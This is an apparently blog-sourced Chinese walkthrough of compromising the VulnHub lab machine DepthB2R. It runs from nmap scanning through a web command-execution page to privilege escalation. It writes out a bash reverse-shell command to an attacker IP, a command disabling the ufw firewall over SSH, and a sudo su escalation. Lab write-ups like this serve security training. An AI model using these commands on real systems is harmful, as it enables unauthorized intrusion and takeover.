下载地址:https://download.vulnhub.com/depth/DepthB2R.ova
一、主机探测与端口扫描
nmap 192.168.121.0/24
发现开启了8080端口
我们对该端口进行扫描
nmap 192.168.121.187 -p- -A -Pn -sV
访问其8080web服务
二、get shell
目录扫描
dirsearch -u http://192.168.121.187:8080
有一个test.jsp,我们访问它
提示我们可以输入命令
输入ls -la /home,发现root 和bill用户
ls -la /home
我们尝试反弹shell
bash -i >& /dev/tcp/192.168.121.171/4444 0>&1
反弹未能成功,我们看一下进程
ps aux
发现ssh服务开放,之前端口扫描没扫到,可能是开了防火墙
查看/etc下,防火墙是存在的
ls -la /etc
我们尝试关闭防火墙
ssh bill@localhost sudo ufw disable
再次尝试反弹
ssh bill@localhost bash -i >& /dev/tcp/192.168.121.171/4444 0>&1
kali开启监听,成功反弹shell
三、提权
sudo -l
sudo -l查看具有sudo权限的命令程序
显示所有用户,直接sudo su
sudo su
成功提权
标签:实战,shell,la,sudo,192.168,DepthB2R,ls,靶场,bill From: https://blog.csdn.net/weixin_68615160/article/details/140934358